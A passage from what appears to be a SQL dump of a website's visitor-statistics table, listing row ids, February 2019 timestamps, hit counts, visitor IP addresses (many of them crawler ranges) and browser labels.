,1549497739,1,1,0,0,'91.196.178.61','chrome'),(382920,1549497753,1,1,0,0,'178.17.171.194','chrome'),(382921,1549498113,1,1,0,0,'54.36.149.19','other'),(382922,1549498369,1,1,0,0,'178.154.244.11','other'),(382923,1549499030,1,1,0,0,'8.29.198.25','other'),(382924,1549499450,1,1,0,0,'54.36.148.150','other'),(382925,1549499624,1,1,0,0,'46.229.168.140','other'),(382926,1549499718,1,1,0,0,'207.46.13.164','other'),(382927,1549499807,1,1,0,0,'66.249.66.154','chrome'),(382928,1549499852,1,1,0,0,'216.244.66.241','other'),(382929,1549499920,2,2,0,0,'66.249.66.156','chrome'),(382930,1549500000,1,1,0,0,'54.36.148.166','other'),(382931,1549500030,1,1,0,0,'54.36.149.3','other'),(382932,1549500303,1,1,0,0,'157.55.39.209','other'),(382933,1549500517,1,1,0,0,'54.36.148.25','other'),(382934,1549500618,1,1,0,0,'54.36.148.96','other'),(382935,1549500634,1,1,0,0,'54.36.148.176','other'),(382936,1549500639,1,1,0,0,'54.36.149.2','other'),(382937,1549500816,1,1,0,0,'8.29.198.25','other'),(382938,1549501042,1,1,0,0,'54.36.148.194','other'),(382939,1549501169,2,2,0,0,'18.237.204.19','chrome'),(382940,1549501461,1,1,0,0,'54.36.149.30','other'),(382941,1549501598,1,1,0,0,'157.55.39.209','other'),(382942,1549501613,2,2,0,0,'207.46.13.112','other'),(382943,1549501623,1,1,0,0,'46.229.168.134','other'),(382944,1549501635,1,1,0,0,'66.249.66.156','chrome'),(382945,1549501694,1,1,0,0,'66.249.66.154','chrome'),(382946,1549501933,1,1,0,0,'54.36.148.186','other'),(382947,1549502065,1,1,0,0,'54.36.148.30','other'),(382948,1549502484,1,1,0,0,'216.244.66.241','other'),(382949,1549502519,1,1,0,0,'54.36.149.107','other'),(382950,1549502904,1,1,0,0,'54.36.148.224','other'),(382951,1549503015,1,1,0,0,'66.249.66.152','chrome'),(382952,1549503353,1,1,0,0,'54.36.148.209','other'),(382953,1549503616,1,1,0,0,'54.36.149.34','other'),(382954,1549503723,1,1,0,0,'54.36.148.255','other'),(382955,1549504118,1,1,0,0,'54.36.148.220','other'),(382956,1549504156,1,1,0,0,'66.249.66.152','chrome'),(382957,1549504291,1,1,0,0,'54.36.149.8','other'),(382958,1549504655,1,1,0,0,'207.46.13.184','other'),(382959,1549504758,1,1,0,0,'46.229.168.147','other'),(382960,1549504796,1,1,0,0,'54.36.148.115','other'),(382961,1549505296,1,1,0,0,'37.115.190.172','msie'),(382962,1549505315,1,1,0,0,'216.244.66.241','other'),(382963,1549505318,2,2,0,0,'66.249.66.156','chrome'),(382964,1549505717,1,1,0,0,'46.229.168.150','other'),(382965,1549505742,1,1,0,0,'46.229.168.142','other'),(382966,1549505844,1,1,0,0,'54.36.148.203','other'),(382967,1549506141,1,1,0,0,'54.36.149.54','other'),(382968,1549506882,1,1,0,0,'54.36.148.121','other'),(382969,1549507322,1,1,0,0,'54.36.148.238','other'),(382970,1549507487,1,1,0,0,'46.229.168.151','other'),(382971,1549507520,1,1,0,0,'54.36.149.24','other'),(382972,1549507587,1,1,0,0,'54.36.149.69','other'),(382973,1549507809,1,1,0,0,'54.36.148.92','other'),(382974,1549507964,1,1,0,0,'46.229.168.152','other'),(382975,1549508127,1,1,0,0,'46.229.168.130','other'),(382976,1549508269,1,1,0,0,'54.36.148.82','other'),(382977,1549508864,1,1,0,0,'66.249.66.156','chrome'),(382978,1549509054,1,1,0,0,'46.229.168.145','other'),(382979,1549509118,1,1,0,0,'54.36.148.45','other'),(382980,1549509388,1,1,0,0,'54.36.149.55','other'),(382981,1549509659,2,2,0,0,'54.36.148.98','other'),(382982,1549509771,1,1,0,0,'54.36.149.37','other'),(382983,1549509903,1,1,0,0,'8.29.198.27','other'),(382984,1549510071,1,1,0,0,'54.36.148.159','other'),(382985,1549510565,2,2,0,0,'66.249.66.156','chrome'),(382986,1549510582,1,1,0,0,'54.36.148.178','other'),(382987,1549510590,1,1,0,0,'46.229.168.146','other'),(382988,1549510658,1,1,0,0,'66.249.66.152','chrome'),(382989,1549510685,1,1,0,0,'207.46.13.112','other'),(382990,1549510835,1,1,0,0,'66.249.66.154','chrome'),(382991,1549511077,1,1,0,0,'216.244.66.241','other'),(382992,1549511474,1,1,0,0,'54.36.148.213','other'),(382993,1549511658,1,1,0,0,'8.29.198.26','other'),(382994,1549511991,3,3,0,0,'66.249.66.156','chrome'),(382995,1549512225,1,1,0,0,'54.36.148.111','other'),(382996,1549512227,1,1,0,0,'54.36.149.25','other'),(382997,1549512465,2,2,0,0,'66.249.66.154','chrome'),(382998,1549512525,1,1,0,0,'128.69.160.92','chrome'),(382999,1549512719,1,1,0,0,'66.249.66.40','chrome'),(383000,1549512967,1,1,0,0,'54.36.148.147','other'),(383001,1549513080,1,1,0,0,'54.36.148.253','other'),(383002,1549513398,1,1,0,0,'46.229.168.153','other'),(383003,1549513515,1,1,0,0,'54.36.148.14','other'),(383004,1549513784,1,1,0,0,'54.36.149.94','other'),(383005,1549514498,1,1,0,0,'54.36.149.79','other'),(383006,1549514659,1,1,0,0,'54.36.148.137','other'),(383007,1549514782,1,1,0,0,'54.36.148.159','other'),(383008,1549514925,1,1,0,0,'46.229.168.134','other'),(383009,1549515212,1,1,0,0,'54.36.149.42','other'),(383010,1549515309,1,1,0,0,'54.36.149.53','other'),(383011,1549515390,1,1,0,0,'54.36.149.67','other'),(383012,1549515495,1,1,0,0,'66.249.66.156','chrome'),(383013,1549515545,1,1,0,0,'54.36.148.205','other'),(383014,1549515704,1,1,0,0,'54.36.148.25','other'),(383015,1549516005,1,1,0,0,'54.36.148.155','other'),(383016,1549516166,1,1,0,0,'66.249.66.152','chrome'),(383017,1549516391,1,1,0,0,'54.36.149.0','other'),(383018,1549516454,1,1,0,0,'207.46.13.82','other'),(383019,1549516747,1,1,0,0,'216.244.66.241','other'),(383020,1549517089,1,1,0,0,'54.36.148.123','other'),(383021,1549517190,1,1,0,0,'46.229.168.134','other'),(383022,1549517215,1,1,0,0,'46.229.168.139','other'),(383023,1549517328,1,1,0,0,'54.36.148.104','other'),(383024,1549517435,1,1,0,0,'46.229.168.136','other'),(383025,1549517458,1,1,0,0,'46.229.168.148','other'),(383026,1549517691,1,1,0,0,'54.36.149.105','other'),(383027,1549517731,1,1,0,0,'54.36.148.239','other'),(383028,1549517846,1,1,0,0,'54.36.148.133','other'),(383029,1549517980,1,1,0,0,'54.36.149.104','other'),(383030,1549518361,1,1,0,0,'54.36.149.80','other'),(383031,1549518368,1,1,0,0,'46.229.168.153','other'),(383032,1549518429,1,1,0,0,'54.36.149.40','other'),(383033,1549518569,1,1,0,0,'47.75.74.239','msie'),(383034,1549518782,1,1,0,0,'54.36.149.90','other'),(383035,1549518793,1,1,0,0,'54.36.148.245','other'),(383036,1549518890,1,1,0,0,'54.36.149.70','other'),(383037,1549519143,1,1,0,0,'54.36.149.26','other'),(383038,1549519333,1,1,0,0,'91.196.178.135','firefox'),(383039,1549519367,1,1,0,0,'46.229.168.134','other'),(383040,1549519403,1,1,0,0,'216.244.66.241','other'),(383041,1549519436,1,1,0,0,'54.36.149.18','other'),(383042,1549519825,1,1,0,0,'54.36.148.203','other'),(383043,1549519969,1,1,0,0,'46.229.168.151','other'),(383044,1549520084,1,1,0,0,'89.234.157.254','other'),(383045,1549520142,1,1,0,0,'54.36.149.21','other'),(383046,1549520163,1,0,1,0,'66.249.66.152',''),(383047,1549520421,1,1,0,0,'54.36.148.59','other'),(383048,1549520758,1,1,0,0,'8.29.198.26','other'),(383049,1549521344,1,1,0,0,'91.196.178.172','chrome'),(383050,1549521436,1,1,0,0,'66.249.66.156','chrome'),(383051,1549521463,1,1,0,0,'66.249.66.42','chrome'),(383052,1549521568,1,1,0,0,'66.249.66.152','chrome'),(383053,1549521595,1,1,0,0,'66.249.66.154','chrome'),(383054,1549522495,1,1,0,0,'8.29.198.27','other'),(383055,1549523564,1,1,0,0,'130.180.219.84','chrome'),(383056,1549523954,1,1,0,0,'178.94.30.159','chrome'),(383057,1549523965,1,1,0,0,'66.249.66.44','chrome'),(383058,1549523995,1,1,0,0,'54.36.148.104','other'),(383059,1549524461,1,1,0,0,'54.36.149.45','other'),(383060,1549524624,1,1,0,0,'46.229.168.136','other'),(383061,1549524844,2,2,0,0,'91.196.178.92','chrome'),(383062,1549524848,1,1,0,0,'54.36.148.199','other'),(383063,1549524897,1,1,0,0,'54.36.149.23','other'),(383064,1549524904,1,1,0,0,'54.36.148.186','other'),(383065,1549525095,1,1,0,0,'54.36.148.184','other'),(383066,1549525693,1,1,0,0,'54.36.149.59','other'),(383067,1549525834,1,1,0,0,'54.36.148.166','other'),(383068,1549526145,1,1,0,0,'54.36.148.14','other'),(383069,1549526504,1,1,0,0,'207.46.13.184','other'),(383070,1549526588,1,1,0,0,'54.36.148.189','other'),(383071,1549526701,1,1,0,0,'46.229.168.133','other'),(383072,1549526790,1,1,0,0,'180.76.15.17','other'),(383073,1549526910,1,1,0,0,'66.249.66.156','chrome'),(383074,1549526912,1,1,0,0,'54.36.148.139','other'),(383075,1549526937,1,1,0,0,'91.196.178.73','chrome'),(383076,1549526963,1,1,0,0,'176.213.244.173','chrome'),(383077,1549527016,1,1,0,0,'94.153.229.229','chrome'),(383078,1549527264,1,1,0,0,'54.36.148.109','other'),(383079,1549527483,1,1,0,0,'46.229.168.146','other'),(383080,1549527644,1,1,0,0,'91.196.178.92','chrome'),(383081,1549527930,1,1,0,0,'54.36.148.41','other'),(383082,1549527972,1,1,0,0,'66.249.66.152','chrome'),(383083,1549528262,1,1,0,0,'54.36.148.140','other'),(383084,1549528394,2,2,0,0,'66.249.66.154','chrome'),(383085,1549528466,1,1,0,0,'46.229.168.137','other'),(383086,1549529177,1,1,0,0,'54.36.148.47','other'),(383087,1549529529,1,1,0,0,'91.196.178.83','chrome'),(383088,1549529673,1,1,0,0,'62.205.134.182','msie'),(383089,1549529684,1,1,0,0,'54.36.149.87','other'),(383090,1549529741,1,1,0,0,'54.36.149.19','other'),(383091,1549530218,1,1,0,0,'95.132.1.94','chrome'),(383092,1549530281,1,1,0,0,'54.36.148.128','other'),(383093,1549530282,1,1,0,0,'54.36.148.108','other'),(383094,1549530310,1,1,0,0,'46.229.168.133','other'),(383095,1549530311,2,2,0,0,'216.244.66.241','other'),(383096,1549530313,1,1,0,0,'207.46.13.184','other'),(383097,1549530314,1,1,0,0,'66.249.66.42','chrome'),(383098,1549530514,1,1,0,0,'54.36.149.27','other'),(383099,1549530575,1,1,0,0,'54.36.148.95','other'),(383100,1549530614,1,1,0,0,'54.36.148.196','other'),(383101,1549530749,1,1,0,0,'157.55.39.209','other'),(383102,1549531067,1,1,0,0,'66.249.66.152','chrome'),(383103,1549531253,1,1,0,0,'207.46.13.184','other'),(383104,1549531259,1,1,0,0,'54.36.148.174','other'),(383105,1549531607,1,1,0,0,'8.29.198.26','other'),(383106,1549531716,1,1,0,0,'91.196.178.92','chrome'),(383107,1549531865,1,1,0,0,'54.36.148.198','other'),(383108,1549531963,1,1,0,0,'54.36.148.191','other'),(383109,1549532109,1,1,0,0,'54.36.149.96','other'),(383110,1549532340,1,1,0,0,'178.95.253.245','chrome'),(383111,1549532426,6,6,0,0,'91.196.178.67','chrome'),(383112,1549532498,1,1,0,0,'207.46.13.184','other'),(383113,1549532557,1,1,0,0,'31.13.115.1','other'),(383114,1549532575,1,1,0,0,'91.196.179.33','chrome'),(383115,1549532705,1,1,0,0,'213.108.44.26','other'),(383116,1549532746,1,1,0,0,'31.13.127.16','other'),(383117,1549532752,1,1,0,0,'31.13.127.17','other'),(383118,1549532808,1,1,0,0,'31.13.115.14','other'),(383119,1549532844,2,2,0,0,'91.196.178.172','chrome'),(383120,1549532874,1,1,0,0,'91.196.177.46','other'),(383121,1549532892,1,1,0,0,'46.133.146.214','chrome'),(383122,1549532893,1,1,0,0,'37.54.17.40','chrome'),(383123,1549532925,2,2,0,0,'91.196.177.46','chrome'),(383124,1549532974,1,1,0,0,'46.211.55.218','chrome'),(383125,1549532988,1,1,0,0,'91.196.178.35','chrome'),(383126,1549532997,1,1,0,0,'91.196.178.93','chrome'),(383127,1549533013,1,1,0,0,'66.249.66.152','chrome'),(383128,1549533063,1,1,0,0,'54.36.149.51','other'),(383129,1549533117,1,1,0,0,'91.196.178.181','chrome'),(383130,1549533142,1,1,0,0,'37.73.239.154','other'),(383131,1549533305,1,1,0,0,'91.196.178.74','chrome'),(383132,1549533328,1,1,0,0,'8.29.198.25','other'),(383133,1549533595,1,1,0,0,'95.135.240.209','chrome'),(383134,1549533713,1,1,0,0,'40.77.167.217','other'),(383135,1549533764,1,1,0,0,'54.36.149.46','other'),(383137,1549533970,1,1,0,0,'66.249.66.154','chrome'),(383138,1549534014,1,1,0,0,'91.196.178.67','chrome'),(383139,1549534087,1,1,0,0,'54.36.148.137','other'),(383140,1549534090,1,1,0,0,'54.36.148.41','other'),(383141,1549534290,1,1,0,0,'54.36.149.35','other'),(383142,1549534482,2,2,0,0,'91.196.179.33','chrome'),(383143,1549534515,1,1,0,0,'52.114.77.26','other'),(383144,1549534516,1,1,0,0,'54.36.148.234','other'),(383145,1549534587,1,1,0,0,'91.196.178.45','chrome'),(383146,1549534599,1,1,0,0,'54.36.148.15','other'),(383147,1549534677,1,1,0,0,'188.239.14.34','chrome'),(383148,1549534816,1,1,0,0,'54.36.148.239','other'),(383149,1549535245,2,2,0,0,'91.196.178.67','chrome'),(383150,1549535262,1,1,0,0,'46.229.168.136','other'),(383151,1549535402,1,1,0,0,'91.196.179.33','chrome'),(383152,1549535452,2,2,0,0,'207.46.13.82','other'),(383153,1549535513,2,2,0,0,'91.196.178.93','chrome'),(383154,1549535596,1,1,0,0,'91.196.178.61','chrome'),(383155,1549535642,1,1,0,0,'91.196.178.170','chrome'),(383156,1549535648,1,1,0,0,'91.196.178.102','chrome'),(383157,1549535787,1,1,0,0,'80.78.51.227','chrome'),(383158,1549535838,1,1,0,0,'54.36.149.66','other'),(383159,1549535857,1,1,0,0,'194.29.62.174','chrome'),(383160,1549535872,1,1,0,0,'216.244.66.241','other'),(383161,1549535943,1,1,0,0,'54.36.148.134','other'),(383162,1549536057,1,1,0,0,'91.196.178.80','chrome'),(383163,1549536325,1,1,0,0,'91.196.178.67','chrome'),(383164,1549536644,1,1,0,0,'66.249.66.152','chrome'),(383165,1549536677,1,1,0,0,'178.171.15.136','chrome'),(383166,1549536695,1,1,0,0,'95.132.8.98','chrome'),(383167,1549536736,1,1,0,0,'207.46.13.184','other'),(383168,1549536821,1,1,0,0,'54.36.148.120','other'),(383169,1549536822,2,2,0,0,'66.249.66.156','chrome'),(383170,1549536919,1,1,0,0,'46.229.168.140','other'),(383171,1549537430,1,1,0,0,'91.196.178.172','chrome'),(383172,1549537488,1,1,0,0,'66.249.66.42','chrome'),(383173,1549537500,1,1,0,0,'95.135.182.167','chrome'),(383174,1549537752,1,1,0,0,'66.249.66.156','chrome'),(383175,1549537852,1,1,0,0,'54.36.149.20','other'),(383176,1549537882,1,1,0,0,'91.196.178.69','chrome'),(383177,1549538029,1,1,0,0,'40.77.167.217','other'),(383178,1549538057,1,1,0,0,'95.134.185.41','chrome'),(383179,1549538111,1,1,0,0,'91.196.178.33','chrome'),(383180,1549538126,1,1,0,0,'54.36.148.253','other'),(383181,1549538248,1,1,0,0,'54.36.148.228','other'),(383182,1549538335,1,1,0,0,'216.244.66.241','other'),(383183,1549538379,2,2,0,0,'66.249.66.154','chrome'),(383184,1549538400,1,1,0,0,'54.36.148.148','other'),(383185,1549538482,1,1,0,0,'213.108.44.26','other'),(383186,1549538529,1,1,0,0,'91.196.178.65','chrome'),(383187,1549538901,1,1,0,0,'93.74.232.137','firefox'),(383188,1549539052,1,1,0,0,'54.36.148.253','other'),(383189,1549539211,1,1,0,0,'66.249.66.152','chrome'),(383190,1549539606,1,1,0,0,'66.249.66.156','chrome'),(383191,1549539695,1,1,0,0,'54.36.148.37','other'),(383192,1549539774,1,1,0,0,'195.201.149.199','chrome'),(383193,1549539862,1,1,0,0,'207.46.13.184','other'),(383194,1549540058,1,1,0,0,'46.211.9.46','chrome'),(383195,1549540102,1,1,0,0,'91.196.178.100','chrome'),(383196,1549540487,1,1,0,0,'37.73.201.230','chrome'),(383197,1549540571,1,1,0,0,'54.36.148.54','other'),(383198,1549540678,1,1,0,0,'40.77.167.217','other'),(383199,1549540689,1,1,0,0,'66.249.66.152','chrome'),(383200,1549540695,1,1,0,0,'66.249.66.154','chrome'),(383201,1549540743,1,1,0,0,'54.36.148.113','other'),(383202,1549540802,1,1,0,0,'46.211.70.95','chrome'),(383203,1549540830,1,1,0,0,'54.36.149.2','other'),(383204,1549540873,1,1,0,0,'46.211.73.87','chrome'),(383205,1549540946,1,1,0,0,'46.229.168.132','other'),(383206,1549541008,1,1,0,0,'54.36.148.33','other'),(383207,1549541053,1,1,0,0,'188.163.178.10','chrome'),(383208,1549541125,1,1,0,0,'54.36.149.61','other'),(383209,1549541202,1,1,0,0,'54.36.148.58','other'),(383210,1549541463,1,1,0,0,'54.36.148.76','other'),(383211,1549541476,1,1,0,0,'91.196.178.83','firefox'),(383212,1549541599,1,1,0,0,'46.211.39.23','chrome'),(383213,1549541879,1,1,0,0,'54.36.148.249','other'),(383214,1549542280,1,1,0,0,'54.36.149.21','other'),(383215,1549542339,1,1,0,0,'46.229.168.143','other'),(383216,1549542475,1,1,0,0,'8.29.198.27','other'),(383217,1549542503,1,1,0,0,'54.36.148.175','other'),(383218,1549542539,1,1,0,0,'46.211.43.9','chrome'),(383219,1549542764,1,1,0,0,'54.36.148.132','other'),(383220,1549542939,1,1,0,0,'54.36.148.178','other'),(383221,1549542953,1,1,0,0,'54.36.149.17','other'),(383222,1549542999,1,1,0,0,'92.112.226.125','chrome'),(383223,1549543148,1,1,0,0,'54.36.148.110','other'),(383224,1549543269,1,1,0,0,'54.36.149.101','other'),(383225,1549543410,1,1,0,0,'66.249.66.152','chrome'),(383226,1549543438,1,1,0,0,'54.36.148.232','other'),(383227,1549543520,1,1,0,0,'54.36.148.87','other'),(383228,1549543551,1,1,0,0,'54.36.148.160','other'),(383229,1549543737,1,1,0,0,'54.36.148.205','other'),(383230,1549543982,1,1,0,0,'216.244.66.241','other'),(383231,1549544159,1,1,0,0,'8.29.198.26','other'),(383232,1549544491,1,1,0,0,'217.12.196.154','chrome'),(383233,1549544497,1,1,0,0,'46.201.121.43','chrome'),(383234,1549544654,1,1,0,0,'54.36.149.57','other'),(383235,1549544659,1,1,0,0,'54.36.148.230','other'),(383236,1549544983,1,1,0,0,'54.36.148.154','other'),(383237,1549545052,1,1,0,0,'178.17.171.194','firefox'),(383238,1549545553,1,1,0,0,'66.249.66.156','chrome'),(383239,1549545732,1,1,0,0,'173.252.87.3','other'),(383240,1549545784,1,1,0,0,'54.36.148.143','other'),(383241,1549546045,1,1,0,0,'54.36.149.47','other'),(383242,1549546074,1,1,0,0,'66.249.66.154','chrome'),(383243,1549546076,1,1,0,0,'54.36.149.16','other'),(383244,1549546126,1,1,0,0,'46.229.168.145','other'),(383245,1549546245,1,1,0,0,'54.36.149.59','other'),(383246,1549546387,1,1,0,0,'54.36.148.193','other'),(383247,1549546447,1,1,0,0,'194.44.241.86','chrome'),(383248,1549546460,1,1,0,0,'91.209.11.236','other'),(383249,1549546472,1,1,0,0,'54.36.148.22','other'),(383250,1549546539,1,1,0,0,'216.244.66.241','other'),(383251,1549546585,1,1,0,0,'46.229.168.149','other'),(383252,1549546596,1,1,0,0,'94.178.130.22','chrome'),(383253,1549546651,1,1,0,0,'54.36.148.99','other'),(383254,1549546750,2,2,0,0,'46.229.168.151','other'),(383255,1549546791,1,1,0,0,'91.196.178.67','chrome'),(383256,1549546906,1,1,0,0,'66.249.66.156','chrome'),(383257,1549547165,1,1,0,0,'54.36.148.131','other'),(383258,1549547176,1,1,0,0,'54.36.148.209','other'),(383259,1549547266,1,1,0,0,'46.229.168.145','other'),(383260,1549547556,1,1,0,0,'91.196.178.169','chrome'),(383261,1549547608,1,1,0,0,'37.53.123.48','chrome'),(383262,1549547714,3,3,0,0,'46.211.74.131','chrome'),(383263,1549547790,1,1,0,0,'54.36.148.191','other'),(383264,1549548097,1,1,0,0,'54.36.148.144','other'),(383265,1549548230,1,1,0,0,'54.36.149.6','other'),(383266,1549548498,1,1,0,0,'54.36.148.225','other'),(383267,1549548719,1,1,0,0,'92.112.125.59','chrome'),(383268,1549548737,1,1,0,0,'66.249.66.152','chrome'),(383269,1549548797,1,1,0,0,'92.112.226.125','chrome'),(383270,1549548965,1,1,0,0,'91.196.178.100','chrome'),(383271,1549548985,1,1,0,0,'54.36.148.57','other'),(383272,1549549215,2,0,2,0,'66.249.66.154',''),(383273,1549549231,1,1,0,0,'54.36.148.98','other'),(383274,1549549341,2,2,0,0,'216.244.66.241','other'),(383275,1549549481,1,1,0,0,'54.36.148.79','other'),(383276,1549549785,1,1,0,0,'54.36.149.21','other'),(383277,1549549950,1,1,0,0,'195.211.63.95','chrome'),(383278,1549550058,1,1,0,0,'91.196.178.52','chrome'),(383279,1549550265,1,1,0,0,'91.196.178.100','chrome'),(383280,1549550286,1,1,0,0,'207.46.13.82','other'),(383281,1549550357,1,1,0,0,'91.196.178.135','firefox'),(383282,1549550462,1,1,0,0,'46.229.168.148','other'),(383283,1549550725,1,1,0,0,'94.45.145.5','firefox'),(383284,1549550767,1,1,0,0,'185.11.31.120','other'),(383285,1549550848,1,1,0,0,'91.200.125.103','chrome'),(383286,1549550875,1,1,0,0,'54.36.149.7','other'),(383287,1549551024,1,1,0,0,'54.36.148.91','other'),(383288,1549551144,1,1,0,0,'46.229.168.140','other'),(383289,1549551560,1,1,0,0,'91.196.178.67','chrome'),(383290,1549551609,1,1,0,0,'54.36.148.136','other'),(383291,1549551925,1,1,0,0,'66.249.66.42','chrome'),(383292,1549552118,1,1,0,0,'94.178.147.109','chrome'),(383293,1549552151,1,1,0,0,'54.36.149.32','other'),(383294,1549552484,1,1,0,0,'91.196.178.165','chrome'),(383295,1549552498,1,1,0,0,'66.249.66.40','chrome'),(383296,1549552554,1,1,0,0,'31.13.127.13','other'),(383297,1549552575,1,1,0,0,'54.36.148.64','other'),(383298,1549552588,1,1,0,0,'54.36.148.60','other'),(383299,1549552788,1,1,0,0,'66.249.66.156','chrome'),(383300,1549552798,1,1,0,0,'91.196.178.170','chrome'),(383301,1549552924,1,1,0,0,'195.60.201.35','chrome'),(383302,1549553128,1,1,0,0,'207.46.13.239','other'),(383303,1549553178,1,1,0,0,'91.196.178.94','firefox'),(383304,1549553321,1,1,0,0,'8.29.198.26','other'),(383305,1549553355,1,1,0,0,'46.211.56.198','other'),(383306,1549553507,1,1,0,0,'54.36.148.177','other'),(383307,1549553602,1,1,0,0,'54.36.149.9','other'),(383308,1549553789,1,1,0,0,'207.46.13.184','other'),(383309,1549553816,1,1,0,0,'91.196.178.97','chrome'),(383310,1549554034,1,1,0,0,'37.9.113.103','other'),(383311,1549554167,1,1,0,0,'66.249.66.156','chrome'),(383312,1549554342,1,1,0,0,'54.36.148.223','other'),(383313,1549554354,1,1,0,0,'193.194.127.115','chrome'),(383314,1549554361,2,2,0,0,'46.211.96.75','other'),(383315,1549554371,1,1,0,0,'54.36.148.74','other'),(383316,1549554420,1,1,0,0,'54.36.149.22','other'),(383317,1549554558,1,1,0,0,'66.249.66.152','chrome'),(383318,1549554597,1,1,0,0,'66.249.66.154','chrome'),(383319,1549554672,1,1,0,0,'180.76.15.25','other'),(383320,1549554930,1,1,0,0,'193.105.152.37','chrome'),(383321,1549554984,1,1,0,0,'178.17.171.194','chrome'),(383322,1549554988,1,1,0,0,'8.29.198.27','other'),(383323,1549555169,1,1,0,0,'54.36.148.76','other'),(383324,1549555256,1,1,0,0,'54.36.148.190','other'),(383325,1549555369,1,1,0,0,'46.229.168.149','other'),(383326,1549555465,1,1,0,0,'40.77.167.144','other'),(383327,1549555475,1,1,0,0,'46.229.168.150','other'),(383328,1549555488,1,1,0,0,'54.36.148.183','other'),(383329,1549555564,1,1,0,0,'66.249.66.156','chrome'),(383330,1549555597,3,3,0,0,'66.249.66.154','chrome'),(383331,1549555616,1,1,0,0,'66.249.66.152','chrome'),(383332,1549555644,1,1,0,0,'46.229.168.152','other'),(383333,1549555729,1,1,0,0,'54.36.148.83','other'),(383334,1549555743,1,1,0,0,'54.36.148.242','other'),(383335,1549555887,2,2,0,0,'54.36.148.181','other'),(383336,1549555941,1,1,0,0,'46.229.168.140','other'),(383337,1549556476,1,1,0,0,'54.36.148.172','other'),(383338,1549556519,1,1,0,0,'91.196.178.172','chrome'),(383339,1549556640,1,1,0,0,'37.73.7.91','chrome'),(383340,1549556910,1,1,0,0,'54.36.148.198','other'),(383341,1549556981,1,1,0,0,'54.36.148.155','other'),(383342,1549557181,1,1,0,0,'66.249.66.152','chrome'),(383343,1549557326,1,1,0,0,'46.229.168.133','other'),(383344,1549557327,1,1,0,0,'54.36.148.139','other'),(383345,1549557503,1,1,0,0,'54.36.149.48','other'),(383346,1549557711,1,1,0,0,'46.211.112.9','chrome'),(383347,1549557861,1,1,0,0,'62.205.134.182','msie'),(383348,1549557909,1,1,0,0,'51.255.65.46','other'),(383349,1549557927,1,1,0,0,'77.111.247.182','chrome'),(383350,1549557943,1,1,0,0,'54.36.149.27','other'),(383351,1549558093,1,1,0,0,'37.53.225.133','chrome'),(383352,1549558104,1,1,0,0,'91.196.178.135','other'),(383353,1549558236,1,1,0,0,'31.134.127.141','chrome'),(383354,1549558321,1,1,0,0,'91.196.178.97','chrome'),(383355,1549558334,1,1,0,0,'66.249.66.44','chrome'),(383356,1549558608,1,1,0,0,'54.36.149.35','other'),(383357,1549558997,1,1,0,0,'54.36.149.69','other'),(383358,1549559458,1,1,0,0,'54.36.148.65','other'),(383359,1549559531,1,1,0,0,'95.132.57.127','chrome'),(383360,1549559980,1,1,0,0,'46.229.168.138','other'),(383361,1549560109,1,1,0,0,'46.229.168.140','other'),(383362,1549560115,1,1,0,0,'54.36.148.117','other'),(383363,1549560293,1,1,0,0,'66.249.66.152','chrome'),(383364,1549560311,1,1,0,0,'54.36.148.243','other'),(383365,1549560420,1,1,0,0,'91.196.178.70','firefox'),(383366,1549560665,1,1,0,0,'54.36.148.97','other'),(383367,1549560812,1,1,0,0,'207.46.13.184','other'),(383368,1549560821,1,1,0,0,'46.229.168.149','other'),(383369,1549560840,1,1,0,0,'54.36.148.34','other'),(383370,1549560900,1,1,0,0,'66.249.66.154','chrome'),(383371,1549561148,1,1,0,0,'54.36.149.1','other'),(383372,1549561380,1,1,0,0,'54.36.148.225','other'),(383373,1549561432,1,1,0,0,'91.196.178.162','chrome'),(383374,1549561436,1,1,0,0,'54.36.148.53','other'),(383375,1549561472,1,1,0,0,'66.249.66.152','chrome'),(383376,1549561924,2,2,0,0,'54.36.149.52','other'),(383377,1549561967,1,1,0,0,'54.36.148.104','other'),(383378,1549562124,1,1,0,0,'91.196.178.19','chrome'),(383379,1549562208,1,1,0,0,'91.196.178.89','chrome'),(383380,1549562543,2,2,0,0,'46.229.168.129','other'),(383381,1549562754,1,1,0,0,'54.36.148.165','other'),(383382,1549562863,1,1,0,0,'54.36.149.29','other'),(383383,1549562910,1,1,0,0,'216.244.66.241','other'),(383384,1549563216,1,1,0,0,'37.54.17.212','chrome'),(383385,1549563318,1,1,0,0,'92.113.191.208','other'),(383386,1549563538,1,1,0,0,'66.249.66.152','chrome'),(383387,1549564059,1,1,0,0,'40.77.167.144','other'),(383388,1549564060,1,1,0,0,'91.196.178.183','chrome'),(383389,1549564167,1,1,0,0,'8.29.198.26','other'),(383390,1549564726,2,2,0,0,'66.249.66.152','chrome'),(383391,1549564869,1,1,0,0,'54.36.148.172','other'),(383392,1549565007,1,1,0,0,'46.229.168.136','other'),(383393,1549565114,1,1,0,0,'54.36.148.181','other'),(383394,1549565127,1,1,0,0,'54.36.149.26','other'),(383395,1549565616,1,1,0,0,'54.36.148.255','other'),(383396,1549565654,1,1,0,0,'66.249.66.44','chrome'),(383398,1549565694,1,1,0,0,'54.36.148.216','other'),(383399,1549565746,1,1,0,0,'54.36.148.171','other'),(383400,1549565815,1,1,0,0,'8.29.198.27','other'),(383401,1549566355,1,1,0,0,'54.36.148.96','other'),(383402,1549566562,1,1,0,0,'207.46.13.82','other'),(383403,1549566789,1,1,0,0,'54.36.148.222','other'),(383404,1549567057,1,1,0,0,'54.36.149.104','other'),(383405,1549567144,1,1,0,0,'178.133.105.82','chrome'),(383406,1549567240,1,1,0,0,'54.36.148.26','other'),(383407,1549567261,2,2,0,0,'66.249.66.152','chrome'),(383408,1549567889,1,1,0,0,'40.77.167.144','other'),(383409,1549567892,1,1,0,0,'54.36.149.60','other'),(383410,1549567999,1,1,0,0,'91.196.178.3','other'),(383411,1549568611,1,1,0,0,'40.77.167.97','other'),(383412,1549568642,2,2,0,0,'54.36.148.143','other'),(383413,1549568655,1,1,0,0,'54.36.148.213','other'),(383414,1549568677,1,1,0,0,'66.249.66.38','chrome'),(383415,1549569111,1,1,0,0,'95.132.23.200','chrome'),(383416,1549569145,1,1,0,0,'54.36.148.239','other'),(383417,1549569220,1,1,0,0,'54.36.148.179','other'),(383418,1549569270,1,1,0,0,'66.249.66.156','chrome'),(383419,1549569779,1,1,0,0,'46.211.26.253','chrome'),(383420,1549569847,1,1,0,0,'54.36.148.177','other'),(383421,1549569906,1,1,0,0,'95.133.192.45','chrome'),(383422,1549570157,1,1,0,0,'207.46.13.184','other'),(383423,1549570304,1,1,0,0,'54.36.149.47','other'),(383424,1549570554,1,1,0,0,'213.108.41.211','chrome'),(383425,1549571241,1,1,0,0,'216.244.66.241','other'),(383426,1549571640,1,1